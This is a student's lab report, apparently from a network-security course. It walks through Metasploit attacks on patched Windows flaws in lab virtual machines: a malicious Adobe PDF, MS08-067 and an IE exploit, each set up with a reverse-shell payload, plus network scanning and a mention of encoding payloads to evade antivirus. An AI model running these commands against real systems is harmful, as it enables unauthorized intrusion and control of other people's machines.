20145205武钰_Exp5 MSF基础应用
20145205武钰_Exp5 MSF基础应用
实验后回答问题
exploit:这个词本身只是利用,但是它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞。但是对我来说这个词就是一个简单的指令执行词,就是个指令代码,并没有什么特别的,就是我们需要在MSF中进行执行了,敲一下就好。
payload:其实吧我对这个词理解不深,就感觉是我们的恶意代码要在靶机中可以做的事情,其实就是我们生产的恶意代码具体可以干什么。
encode:在我们学习了英语后我们都知道“en”是一个动词,所以encode就是对于我们之前的恶意代码进行一个再编译的过程,达到我们的目的——免杀
实验感想
我们这个的实验是用已经被修补的漏洞,然后我们只是在前人的基础上感受了一把通过微软漏洞进行的攻击的感觉,只要我们平时及时下载补丁,修补我们的漏洞,其实黑客是很难对我们进行漏洞的渗透攻击的,而且我们也要注意上网习惯,注意一些的奇怪的域名,小心被“钓鱼“,而且我感觉这次实验的实际步骤应该是先进行局域网内的端口扫描,获得目标靶机的IP地址,之后进行主动攻击,获得目标机的权限,之后或是传输到靶机生产的PDF文件,或是将靶机的浏览器主页换成我们的钓鱼网页都是可以的。
还有就是为了找到一个和大家不相同的漏洞,本来是想在MSF里直接搜一个挑个来做的,但是密密麻麻的英文让我退却了,然后就在百度上自己随便输了个漏洞年号,之后去看常用的搜索项,也是佩服我自己的聪明才智。
实践过程记录
Adobe阅读器渗透攻击
实验准备
两台虚拟机,其中一台为
kali
,一台为windows xp sp3
首先在实验前我们可以打开KALI中的显示隐藏文件夹,或是我们不打开显示隐藏文件,可以使用我们的之前实验中用到的netcat进行传输。
还要注意的一点是保证两台虚拟机可以ping通,无论是nat还是桥接通了就可以,为了ping通的话需要关闭防火墙。
实验步骤
- 在kali终端中开启msfconsole
- 输入命令
use exploit/windows/fileformat/adobe_cooltype_sing
进入该漏洞模块 - 使用命令
set payload windows/meterpreter/reverse_tcp
设置攻击有效载荷 - 输入命令
show options
显示模块设定参数,然后按照我们自己的情况进行修改
- 在设定完成后,生产PDF文件,然后将PDF文件拖入到靶机中,之后就像是我们之前做的恶意代码实验一样。
- 建立一个监听模块,
use exploit/multi/handler
- 使用
set payload windows/meterpreter/reverse_tcp
建立一个可靠的反弹链接,监听模块的端口也是需要我们按照自己的情况进行设定的。 - 最后
exploit
开启监听模块在靶机中打开问题PDF,即可获得靶机权限。
- 但是这种方式靶机那边的PDF并不会打开,就像是程序崩溃的感觉一样,但是如果关闭了问题PDF文件,靶机同kali的链接就会中断,而且我们也可以通过网络资源发现靶机正在和kali进行链接。
MS08_067漏洞渗透攻击实践
实验准备
- 两台虚拟机,其中一台为
kali
,一台为windows xp sp3
- 预先设置虚拟机网络,保证两台虚拟机间可以ping通。
实验过程
- 首先我们在知道了具体的漏洞号之后,在进行MSF后,输入
search ms08_067
,会显示出找到的渗透模块,如下图所示:
- 输入
use exploit/windows/smb/ms08_067_netapi
,进入该漏洞模块的使用,在输入命令时时不时TAB
一下会省很多功夫,建议没事多点一下TAB
- 之后依然是设置有效攻击载荷,输入
set payload generic/shell_reverse_tcp
进入载荷模块,之后show options
查看具体参数,然后修改参数。
- 这里我们需要注意点的一点是,
LHOST
是本机地址,RHOST
是靶机IP,设置好后,输入我们的开启攻击的号角exploit
- 对比可知我们获得了靶机的管理员权限
IE浏览器渗透攻击——MS11030安全漏洞
实验准备
- 两台虚拟机,其中一台为
kali
,一台为windows 7
,浏览器版本为IE 8 - 预先设置虚拟机网络,保证两台虚拟机间可以ping通。
实验过程
- 首先进入漏洞模块,因为我们已知漏洞号之间进行漏洞模块,进入之后显示一下参数,然后根据我们的自身情况设置一下参数
- 这里我们设置的错误路径为
baidu.com
,端口自己随意就好,尽量不要和已知使用端口占用进行冲突,然后我们设置攻击载荷。
- 还是老套路,根据自己kali情况设置本地IP和端口,之后输入
exploit
启动漏洞服务,等待靶机那个“一个不小心”输入了一长串我们的钓鱼网址
- 这时在靶机的浏览器中输入
http://kali ip:port/uripath
也就是输入对应的我们上面设置的参数
- 稍作等待,kali这边就会有成功链接的反应
- 之后输入
sessions
查看一下MSF中的会话情况,找到我们和win7
的会话编号
- 输入
sessions -i 会话ID
进入我们要进入的会话中,就会发现我们以后获取了靶机的权限
- 这是我们
win 7
的IP地址
辅助模块的实践
实验前准备
- 将kali机的模式改为桥接模式,因为这个在实际应用中最好我们可以使用公网地址,虽然这样会被抓,或是在无线局域网中使用桥接模式,可以保证和其他在这个局域网中的主机在同一个网段中,可以ping通。
- 本次实验是实践一下两种进行网络中对于其他主机扫描的辅助模块
- 为了提升一下扫描速度,我们可以预先建立msf数据库,在kali的终端中依次输入以下命令
service postgresql start
之后输入msfdb start
- 然后进入msf
- 输入
use auxiliary/scanner/discovery/arp_sweep
进入模块,然后输入show options
查看并修改参数
- 然后根据自身的情况修改参数
- 然后就可以开始扫描了了,因为是辅助模块,并没有进行漏洞渗透攻击,所以我们的启动指令是
run
,然后可以看到这个局域网中除了自己的主机,其他的主机,因为我当时只开了kali,所以只会扫描到我的win 10主机
- 在确认可以ping通后,使用nmap进行开放端口扫描,探知该主机开放的端口和服务
20145205武钰_Exp5 MSF基础应用的更多相关文章
- 20145218张晓涵_Exp5 MSF基础应用
20145218张晓涵_Exp5 MSF基础应用 实验原理 MS08-067漏洞描述 MS08-067漏洞的全称为"Windows Server服务RPC请求缓冲区溢出漏洞",如果 ...
- 20145205 武钰 《网络对抗》Exp8 Web基础
一点题外话 本次实验我三号完成的,由于一些原因吧,一直没发博客,拖到了现在,这里说就是评判一下自己的懒惰. 实验后问题回答 (1)什么是表单 表单在网页中主要负责数据采集功能. 一个表单有三个基本组成 ...
- 20145205武钰《网络对抗》web安全基础实践
实验后问题回答 (1)SQL注入攻击原理,如何防御 攻击原理:SQL注入攻击就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL命令的目的 防御手 ...
- 20165223《网络对抗技术》Exp5 MSF基础应用
目录 -- MSF基础应用 实验说明 实验任务内容 基础问题回答 实验内容 主动攻击 ms17_10_eternalblue(成功) ms17_10_psexec(成功) ms08_067_netap ...
- 2018-2019 20165232 Exp5 MSF基础应用
2018-2019 20165232 Exp5 MSF基础应用 一.原理与实践说明 1.实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个 ...
- 20155324 实验5 MSF基础应用
20155324 实验5 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 服务器信息块(SMB)是一个网络文件共享协议,它允许应用程序和终端用户从远端的 ...
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019-2 20165234 《网络对抗技术》 Exp5 MSF基础应用
实验五 MSF基础应用 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动攻击实践,ms08_067(成功) 2. 一个针对浏览器 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
随机推荐
- 线程池和进程池的通用写法 ProcessPoolExecutor 和 ThreadPoolExecutor
import time from comcurrent.futures import ThreadPoolExecutor,ProcessPoolExccoutor#这个方法可以用进程池或者线程池 d ...
- RSA原理说明
长度,建议至少1024.模数n(常取默认65537)两边都要用. 指数e,和n一起就是公钥. 指数d,和n一起就是私钥. 质数p和q用于生成密钥对,然后就丢弃不公开. 一.密钥对的生成步骤 1.随机选 ...
- 【Python】小练习
1.python爬虫 (1)抓取一个新闻网上含有某一关键字的新闻,http://internasional.kompas.com/就是这个网站上面所有内容含有THAAD这个关键词的新闻 (2)爬取大众 ...
- mysql 操作sql语句 操作数据表中的内容/记录
#3. 操作文件中的内容/记录 往哪张表去插入 insert into 表名指定字段(id,name) 插入要加values(针对前面字段插入)(2,mike); insert into t1(id, ...
- mysql 数据操作 单表查询 目录
mysql 数据操作 单表查询 mysql 数据操作 单表查询 简单查询 避免重复DISTINCT mysql 数据操作 单表查询 通过四则运算查询 mysql 数据操作 单表查询 concat()函 ...
- 微软官方出的各种dll丢失的修复工具
例如 :因为计算机中丢失 api-ms-win-crt-runtime-l1-1-0.dll.尝试重新安装该程序以解决此问题. 软件名称: Visual C++ Redistributable for ...
- U盘安装win10操作系统
https://www.zhihu.com/question/39207359 1:进入微软官方网站,点击立即下载工具,下载完成mediacreationtool,双击打开,接受协议 https ...
- 搭建基于HTTP协议内网yum仓库
目录 1. 前言 2. 把rpm包下载到本地 3. 配置nginx对外提供服务 4. 配置本地repo文件 5. 生成repodata信息 6. 检查及使用 7. 对管理机器上的仓库进行更新 参考资料 ...
- jquery更改表格行顺序实例
使用jquery写的更改表格行顺序的小功能 表格部分: 复制代码代码如下: <table class="table" id="test_table"> ...
- Oracle彻底删除11gR2 GI
Oracle彻底删除11gR2 GI 环境:RHEL 6.5 + Oracle 11.2.0.4 GI 需求:在搭建Standby RAC时,安装GI软件期间由于GI安装遇到一些问题,root脚本执行 ...